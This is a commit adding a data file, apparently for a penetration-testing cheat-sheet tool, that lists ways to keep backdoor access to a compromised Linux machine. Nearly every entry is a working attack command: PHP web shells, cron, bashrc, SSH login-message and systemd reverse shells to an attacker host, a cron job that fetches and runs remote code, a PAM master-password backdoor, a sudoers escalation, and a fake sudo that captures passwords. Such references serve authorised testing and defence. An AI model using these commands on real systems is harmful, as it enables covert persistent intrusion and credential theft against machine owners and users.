Nicholas Ferreira
committed
Oct 24, 2023
1 parent
04f2b1b
commit e150eb7
Showing
2 changed files
with
135 additions
and
8 deletions.
@@ -0,0 +1,126 @@ | ||
title = "Linux backdoors" | ||
description = "What to do to backdoor a linux machine once you got access to it" | ||
tags = ["linux", "backdoor", "php", "ssh", ] | ||
source = ["https://airman604.medium.com/9-ways-to-backdoor-a-linux-box-f5f83bae5a3c","http://0x90909090.blogspot.com/2016/06/creating-backdoor-in-pam-in-5-line-of.html","https://tryhackme.com/room/linuxbackdoors", "https://gist.github.com/hoefler02/2ca8166c167f147c8fb076b48eb7cb47", "https://r.0x7359.com/", "https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9", "https://hosakacorp.net/p/systemd-user.html", "https://gist.github.com/ahhh/1d4bf832c5a88cc75adb"] | ||
|
||
[[data]] | ||
description = "Add your public SSH key to the compromised user's ~/.ssh/authorized_keys file." | ||
language = "bash" | ||
command = """#On your machine: | ||
ssh-keygen -f ./backdoor | ||
cat backdoor.pub #Copy the public key | ||
#On the compromised machine (substitute <public key>): | ||
echo '<public key>' >> ~/.ssh/authorized_keys | ||
#Connect to the compromised machine with | ||
ssh compromised-user@machine-ip -i backdoor""" | ||
|
||
[[data]] | ||
description = """Web PHP backdoor. | ||
Put it on some .php file and run it making a request with the parameter 'x'. Works with both GET and POST (POST is stealthier):""" | ||
language = "php" | ||
command = """<?php shell_exec($_REQUEST['x']);""" | ||
|
||
[[data]] | ||
description = "Web PHP backdoor (even stealthier):" | ||
language = "php" | ||
command = """#Run commands with | ||
# curl -H "x:ls -la" example.com/backdoor.php | ||
# curl -H "x:cat /etc/passwd" example.com/backdoor.php | ||
<?php echo shell_exec($_SERVER['HTTP_X']);?>""" | ||
|
||
[[data]] | ||
description = "Tiniest PHP backdoor possible:" | ||
language = "php" | ||
command = """#Run commands with example.com/backdoor.php?0=ls -la | ||
<?=`$_GET[0]`?>""" | ||
|
||
[[data]] | ||
description = "Crontab backdoor keeping existing crontabs (substitute <ATTACKER IP> and <PORT>):" | ||
language = "bash" | ||
command = """(crontab -l > .tab ; echo "* * * * * 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1""" | ||
|
||
[[data]] | ||
description = "Crontab backdoor overwriting existing crontabs:" | ||
language = "bash" | ||
command = """(touch .tab ; echo "* * * * * 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1""" | ||
|
||
[[data]] | ||
description = "Example sending bash reverse shell every 5 min:" | ||
language = "bash" | ||
command = """(touch .tab ; echo "*/5 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/<ATTACKER ip>/<PORT> 0>&1'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1""" | ||
|
||
[[data]] | ||
description = """Running arbitrary commands every minute with cron via http. | ||
Set up a webserver and create a file named 'run'. Put on it the commands you want to run on the compromised machine.""" | ||
language = "bash" | ||
command = """(crontab -l > .tab ; echo "* * * * * 'curl https://<ATTACKER IP>/run | sh'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1""" | ||
|
||
[[data]] | ||
description = "Bashrc backdoor. Will run everytime a new terminal session is started:" | ||
language = "bash" | ||
command = """echo 'mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f' >> ~/.bashrc""" | ||
|
||
[[data]] | ||
description = "PAM backdoor to log in into any user (root required):" | ||
language = "bash" | ||
command = """#Compilation dependencies: apt install -y autoconf automake autopoint bison bzip2 docbook-xml docbook-xsl flex gettext libaudit-dev libcrack2-dev libdb-dev libfl-dev libselinux1-dev libtool libcrypt-dev libxml2-utils make pkg-config sed w3m xsltproc xz-utils gcc | ||
git clone https://github.com/zephrax/linux-pam-backdoor | ||
#Change 1.4.0 to other existing version if applicable (https://github.com/linux-pam/linux-pam/releases) | ||
./backdoor.sh -v 1.4.0 -p passw0rd | ||
#This will generate a pam_unix.so. Copy it to /lib/x86_64-linux-gnu/security/ on the target machine. | ||
#Now log in into any user using the password 'passw0rd'.""" | ||
|
||
[[data]] | ||
description = "Add your unprivileged user to sudoers (substitute <USER>) (root required)" | ||
language = "bash" | ||
command = """echo '<USER> ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers""" | ||
|
||
[[data]] | ||
description = "Backdooring SSH message of the day. This will be run whenever someone logs in into the server via SSH:" | ||
language = "bash" | ||
command = """echo -e '#!/bin/sh\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f &' > 20-backdoor && chmod +x 20-backdoor""" | ||
|
||
[[data]] | ||
description = "Backdooring systemd services. Change <ATTACKER IP> and <ATTACKER PORT> and run this script on the compromised machine. The backdoor will run whenever a user logs in into the server:" | ||
language = "ini" | ||
command = """#!/bin/sh | ||
IP="<ATTACKER IP>" | ||
PORT="<ATTACKER PORT>" | ||
SYSTEMD_PATH="/usr/lib/systemd/user/ $HOME/.local/share/systemd/user/ /etc/systemd/user/ $HOME/.config/systemd/user/ $XDG_RUNTIME_DIR/systemd/user/" | ||
W_PATH="" | ||
UNIT="voodoo.service" | ||
UNIT_CONTENT="[Unit] | ||
Description=Black magic happening, avert your eyes | ||
[Service] | ||
RemainAfterExit=yes | ||
Type=simple | ||
ExecStart=/bin/bash -c \"exec 5<>/dev/tcp/$IP/$PORT; cat <&5 | while read line; do \$line 2>&5 >&5; done\" | ||
[Install] | ||
WantedBy=default.target" | ||
for i in $SYSTEMD_PATH; do | ||
mkdir -p "$i" | ||
if [ -w "$i" ]; then W_PATH="${i%/} $W_PATH"; fi | ||
done | ||
for k in $W_PATH; do | ||
echo "$UNIT_CONTENT" > "$k/$UNIT" | ||
echo "[*] created voodoo in '$k/$UNIT" | ||
done | ||
systemctl --user daemon-reload | ||
systemctl --user restart $UNIT > /dev/null | ||
systemctl --user enable $UNIT""" | ||
|
||
[[data]] | ||
description = "Sudo backdoor for stealing passwords. This will mimics the original sudo binary behavior and gets the user's password. After downloading, edit the file and change 'localhost 31337' on the last lines to your ip and port to receive the information. You can also set up a webserver and curl the password to it:" | ||
language = "bash" | ||
command = """#Change /tmp/sudo if needed | ||
wget https://raw.githubusercontent.com/nisay759/sudo-backdoor/master/sudo.sh -O /tmp/sudo | ||
chmod +x /tmp/sudo | ||
echo 'alias sudo="/tmp/sudo"' >> ~/.bashrc""" |